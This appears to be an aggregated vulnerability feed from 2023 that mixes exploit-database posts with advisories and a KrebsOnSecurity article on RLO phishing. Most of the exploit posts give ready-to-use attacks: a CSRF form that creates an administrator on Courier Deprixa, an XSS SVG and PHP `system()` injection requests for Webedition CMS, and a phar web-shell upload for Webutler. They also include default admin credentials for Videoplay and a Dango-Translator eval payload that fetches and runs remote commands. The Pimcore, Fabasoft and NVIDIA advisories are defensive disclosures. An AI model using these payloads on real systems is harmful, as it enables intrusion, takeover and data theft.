COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

COURIER DEPRIXA 2.5 Cross Site Request Forgery

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Videoplay version 1.3.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Videoplay V1.3.0 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                               || # Vendor    : https://codecanyon.net/                                                                                              |  | # Dork      : VideoPlay - The best video subscription platform                                                                     |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Use Admin : admin@coffeetheme.com & Pass : password[+] https://videoswebguyzdashboardcom/dashboard/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Videoplay 1.3.0 Insecure Settings

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on LinkedIn, or abusing an encoding method that makes it easy to disguise booby-trapped Microsoft Windows files as relatively harmless documents.

One frustrating aspect of email phishing is the frequency with which scammers fall back on tried-and-true methods that really have no business working these days. Like attaching a phishing email to a traditional, clean email message, or leveraging link redirects on **LinkedIn**, or abusing an encoding method that makes it easy to disguise booby-trapped **Microsoft Windows** files as relatively harmless documents.

KrebsOnSecurity recently heard from a reader who was puzzled over an email he’d just received saying he needed to review and complete a supplied W-9 tax form. The missive was made to appear as if it were part of a mailbox delivery report from **Microsoft 365** about messages that had failed to deliver.

The reader, who asked to remain anonymous, said the phishing message contained an attachment that appeared to have a file extension of “.pdf,” but something about it seemed off. For example, when he downloaded and tried to rename the file, the right arrow key on the keyboard moved his cursor to the left, and vice versa.

The file included in this phishing scam uses what’s known as a “right-to-left override” or RLO character. RLO is a special character within unicode — an encoding system that allows computers to exchange information regardless of the language used — that supports languages written from right to left, such as Arabic and Hebrew.

Look carefully at the screenshot below and you’ll notice that while Microsoft Windows says the file attached to the phishing message is named “lme.pdf,” the full filename is “fdp.eml” spelled backwards. In essence, this is a .eml file — an electronic mail format or email saved in plain text — masquerading as a .PDF file.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued. “When the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to ‘\_\_\_fdp.eml.’ One would think Microsoft would have had plenty of time by now to address this.”

Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasn’t a new trick.

Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the “Restore Messages” link there bounces you through an open redirect on **LinkedIn** before forwarding to the phishing webpage.

As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly Linkedin’s parent firm Microsoft).

The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.

In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.

According to the latest figures from **Check Point Software**, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.

An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.

If you’re unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark to avoid potential typosquatting sites.

Teach a Man to Phish and He’s Set for Life

Pimcore is an Open Source Data & Experience Management Platform: PIM, MDM, CDP, DAM, DXP/CMS & Digital Commerce. A path traversal vulnerability exists in the `AssetController::importServerFilesAction`, which allows an attacker to overwrite or modify sensitive files by manipulating the pimcore_log parameter.This can lead to potential denial of service---key file overwrite.
The impact of this vulnerability allows attackers to: overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information. This could also cause a denial of service (DoS) if critical system files are overwritten or deleted.

**Impact**

A path traversal vulnerability exists in the AssetController::importServerFilesAction, which allows an attacker to overwrite or modify sensitive files by manipulating the pimcore\_log parameter.This can lead to potential denial of service---key file overwrite.

The impact of this vulnerability allows attackers to:

Overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information.

Tamper with system settings by modifying key files, such as the hosts file in Windows or configuration files for other services.

Cause a denial of service (DoS) if critical system files are overwritten or deleted.

The consequences of exploiting this vulnerability can be detrimental to the confidentiality, integrity, and availability of the affected system. It's crucial to address this vulnerability to protect sensitive data and ensure the proper functioning of the system.

**Patches**

Update to version 10.6.7 or apply this patch manually https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch

**Workarounds**

Apply patch https://github.com/pimcore/pimcore/commit/58012d0e3b8b926fb54eccbd64ec5c993b30c22c.patch manually.

CVE-2023-38708: Path traversal in AssetController:importServerFilesAction

Dango-Translator v4.5.5 was discovered to contain a remote command execution (RCE) vulnerability via the component app/config/cloud_config.json.

Vulnerability Product: Dango-Translator Ver4.5.5  
Vulnerability version: Ver4.5.5  
Vulnerability type: Hijacked Remote Command Execute  
Vulnerability Details:  
Vulnerability location: app/config/cloud\_config.json

withoud check the xxxUse variable in app/config/cloud\_config.json and eval it ,unsafe config may causes Hijacked Remote Command Execute  
  

client payload : "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"  
remote hijacking program : https://github.com/Leeyangee/leeya\_bug/raw/main/DangoTranslator\_payload/testProject/testProject.exe  
remote hijacking program original code : https://github.com/Leeyangee/leeya\_bug/tree/main/DangoTranslator\_payload/testProject

**PROVE:**

Firstly download a Dango-Translator Ver4.5.5  
Run the program to generate config  

Secondly go to app/config/cloud\_config.json, replace value of xxxUse with client payload,  
here replace "tencentwebUse": "False" with  "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"  

Thirdly download remote hijacking program : https://github.com/Leeyangee/leeya\_bug/raw/main/DangoTranslator\_payload/testProject/testProject.exe, and keep the program running  
(This is a remote hijacking program, so you can deploy it on server but need to change IP\_DOMAIN in original\_code and url in client payload and re-compile it)  

Fourthly run "团子翻译器.exe", after login in, windows pops up a calculator(because remote hijacking program runs "calc" command on the client)  

Once the client login in, the remote hijacking program could detect it and run command on the client

proved Hijacked Remote Command Execute

**REASON:**

the client payload is divided into these parts  

the result of eval(client payload) is it self, because "tencentwebUse" will be evaled before exit  
  

**Harm:**

attackers could replace payload in order to let client respond a shell to attackers  
so attackers could directly obtain shell and get server permissions

discovered by leeya\_bug

CVE-2023-38942: [Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 · Issue #127 · PantsuDango/Dango-Translator

Fabasoft Cloud Enterprise Client 23.3.0.130 allows a user to escalate their privileges to local administrator.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # Vendor ID: PDO06614 # CSNC ID: CSNC-2023-002 # CVE ID: CVE-2023-32764 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Dennis Henke # Date: 08.05.2023 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.3.0.130 / 23.3.130 Not vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.6.0.99 / 23.6.99 Not vulnerable (regarding vendor announcement): \* 23.4.0.66 and above \* 23.0.1.23 and above \* 22.9.0.75 and above \* 22.0.3.88 and above \* 21.1.3.204 and above Other products were affected (Windows only): Fabasoft Folio / eGov-Suite 2021 Update Rollup 3 Fabasoft Folio / eGov-Suite 2022 (up to Update Rollup 3 and Feature Track) Fabasoft Folio / eGov-Suite 2023 (up to Update Rollup 1) Fabasoft Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The update mechanism after successful validation of a signed MSI file is vulnerable. It is possible to place a Fabasoft-signed MSI update or setup file to pass the validation check. After that, the MSI file will be renamed and handed over to the msiexec setup process. During this step, it is possible to re-rename the file and exchange it with an arbitrary MSI package. A commandline script can do the job and performs the renaming operations in a loop to exchange the MSI package once it is possible, before the update process will hand over the file to msiexec. The update process will produce some access errors first, because of the renaming operation, but it has some tolerance and retries to access the file. The exchanged malicious MSI package will be taken, handed over to msiexec and installed with SYSTEM privileges. This means that an unprivileged user can install arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be used, e.g., to start a reverse shell or execute other malicious commands. Workaround / Fix: ----------------- The processing of MSI packages during the update process should be revised to ensure, that it is not possible to exchange any packages originated from untrusted sources. A patch has already been released by the publisher. The update service should install update packages from a folder for which non-admin users do not have change or modify privileges. Microsofts guidelines and best-practices for MSI packages should be considered during development. In general, the update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate" or "folioupdatepm2X". Timeline: --------- 2023-05-08: Discovery by Tino Kautschke and Dennis Henke 2023-05-08: Initial vendor notification 2023-05-08: CVE number requested 2023-05-15: CVE number reserved: CVE-2023-32764 2023-06-09: Test of version 23.6.99, vulnerability has been fixed 2023-07-04: Last public vulnerability announcement by vendor (PDO06614) \[4\] 2023-08-02: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://help.supportservices.fabasoft.com/index.php?topic=doc/Vulnerabilities-Fabasoft-Folio/vulnerabilities-2023.htm#client-autoupdate-harmful-code-installation-vulnerability-pdo06614-

CVE-2023-32764


NVIDIA Omniverse Workstation Launcher for Windows and Linux contains a vulnerability in the authentication flow, where a user’s access token is displayed in the browser user's address bar. An attacker could use this token to impersonate the user to access launcher resources. A successful exploit of this vulnerability may lead to information disclosure.



**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2023‑25524

NVIDIA Omniverse Workstation Launcher for Windows and Linux contains a vulnerability in the authentication flow, where a user’s access token is displayed in the browser user's address bar. An attacker could use this token to impersonate the user to access launcher resources. A successful exploit of this vulnerability may lead to information disclosure.

4.0

CWE-598  
AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates**

The following table lists the NVIDIA software products affected, software versions affected, and the updated version that includes this security update.

**CVE IDs Addressed**

**Software Product**

**Affected Versions**

**Updated Version**

CVE-2023-25524

Omniverse Workstation Launcher

1.8.7 and prior versions

1.8.11

**Notes**

*   Earlier software releases of this product might also be affected. If you are using an earlier release, upgrade to the latest release.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to:

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins 
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

August 3, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

Tag

#windows